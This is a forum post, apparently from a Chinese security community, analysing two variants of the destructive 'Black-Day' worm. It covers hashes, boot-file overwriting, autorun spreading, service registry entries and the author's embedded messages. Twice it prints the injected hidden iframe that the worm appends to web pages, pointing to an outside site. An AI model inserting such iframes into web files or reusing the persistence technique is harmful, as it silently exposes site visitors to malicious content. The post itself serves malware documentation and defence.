1   1  /  1  页   跳转

【原创】可恶的蠕虫Worm/BlackDay

收藏
newcenturymoon
头像
社区嘉宾
  • 帖子:15158
  • 注册: 2005-08-03
  • 来自:
论坛8周年活动礼物幸运草
发表于: 2007-04-14 23:31 | 显示全部 短消息 资料
字号: 1楼

【原创】可恶的蠕虫Worm/BlackDay

艾玛给我的样本 在此表示感谢
现在一共两个变种
Worm.YadBlac.a和Worm.YadBlac.b
Worm.YadBlac.a分析报告:

样本名称 Black-Day.exe
文件大小 251,904 字节
MD5 50d2a304a75dc49b3ac4cc77d2614d01
编写语言 delphi
这是一个完全破坏电脑的恶性病毒
运行后
首先弹出如图1之窗口然后

1.将C:\windows根目录下以及其下子目录的(不包括system32文件夹),D-Z盘中除.asp|.htm|.html|.aspx|.PHP|.JSP以外所有的小于自身文件长度的文件删除,然后把自己伪装成目标文件。对于大于自身文件长度的文件都替换成 246K的病毒文件,但被破坏的文件的文件名不会发生改变。
甚至连C:\AUTOEXEC.BAT
C:\boot.ini
C:\CONFIG.SYS文件都被替换成病毒文件 直接导致无法开机 系统完全被破坏掉

2.感染如上目录中的.asp|.htm|.html|.aspx|.PHP|.JSP文件
在其后面插入如下代码
<iframe src='http://www.dadayouxi.net/index.htm' width=0 height=0></iframe>

3.IE不能使用 出现如图2的现象 点击确定后 IE一闪而过

4.不能关机 重启 和注销

病毒体内信息
hi,friend:\n\nyour computer were infect my worm!\n\nand if you want to clear this worm\n\nplease add my qq num:5188340,87408749,76665639\n\nthe worm name:black-day\n\npowered by :wswhacker


Worm.YadBlac.b分析报告:
样本名称 Black-Day.exe
文件大小 257,536 字节
MD5 d73cc3af4dea1754f3a0f90ea0028589
编写语言 delphi

不知道怎么回事 可能是我用虚拟机测试的问题 测试此变种中出现了错误
只观察到此变种出现了如下变化

释放文件
C:\WINDOWS\system32\interview.exe
每个分区下释放一个
autorun.inf
和BLACK-DAY.EXE 达到双击启动目的

而且仍然用自身替换C:\AUTOEXEC.BAT
C:\boot.ini
C:\CONFIG.SYS
不过这回增加了一个
C:\bootfont.bin
(汗一个,开机需要的核心启动有一半都被他替换掉了)

C:\WINDOWS\system32\interview.exe注册了一个服务Sysintevet(上个版本貌似没发现开机启动的东西,这个版本加上了)
该服务的相关注册表项目如下

HKLM\SYSTEM\CurrentControlSet\Services\Sysintevet\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\Sysintevet\Type: 0x00000110
HKLM\SYSTEM\CurrentControlSet\Services\Sysintevet\Start: 0x00000002
HKLM\SYSTEM\CurrentControlSet\Services\Sysintevet\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\Sysintevet\ImagePath: "C:\WINDOWS\system32\interview.exe"
HKLM\SYSTEM\CurrentControlSet\Services\Sysintevet\DisplayName: "System Inter Event"
HKLM\SYSTEM\CurrentControlSet\Services\Sysintevet\ObjectName: "LocalSystem"
HKLM\SYSTEM\CurrentControlSet\Services\Sysintevet\Description: "Interenet 网络服务事件"

病毒体内信息
i can't chang my sanguinary inbeing,nerver.i canfeel that the tear come by my face.kill my self  is the best,maybe.so please.\n\nmy name:wswhacker my age:17\n\ni feeling free when i am not in prison.can you feel my word?

hi,friend:\n\nyour computer were infect my worm!\n\nand if you want to clear this worm\n\nplease add my qq num:5188340,87408749,76665639\n\nthe worm name:black-day\n\npowered by :wswhacker

其他的现象通过其代码推断应该是如下的

感染.asp.aspx.php.jsp.htm.html等文件 在其后面添加代码
<iframe src='http://www.dadayouxi.net/index.htm' width=0 height=0></iframe>
其他替换其他文件的做法 由于我不太懂汇编所以无法证明 不过应该和上一版本一样吧!
图1

附件附件:

下载次数:321
文件类型:image/pjpeg
文件大小:
上传时间:2007-4-14 23:31:18
描述:



最后编辑2007-04-15 00:03:27.873000000
分享到:
gototop
 
newcenturymoon
头像
社区嘉宾
  • 帖子:15158
  • 注册: 2005-08-03
  • 来自:
论坛8周年活动礼物幸运草
发表于: 2007-04-14 23:36 | 显示全部 短消息 资料
字号: 2楼

图2

附件附件:

下载次数:296
文件类型:image/pjpeg
文件大小:
上传时间:2007-4-14 23:36:02
描述:
gototop
 
newcenturymoon
头像
社区嘉宾
  • 帖子:15158
  • 注册: 2005-08-03
  • 来自:
论坛8周年活动礼物幸运草
发表于: 2007-04-15 00:03 | 显示全部 短消息 资料
字号: 3楼

病毒截图

附件附件:

下载次数:317
文件类型:image/pjpeg
文件大小:
上传时间:2007-4-15 0:03:27
描述:
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT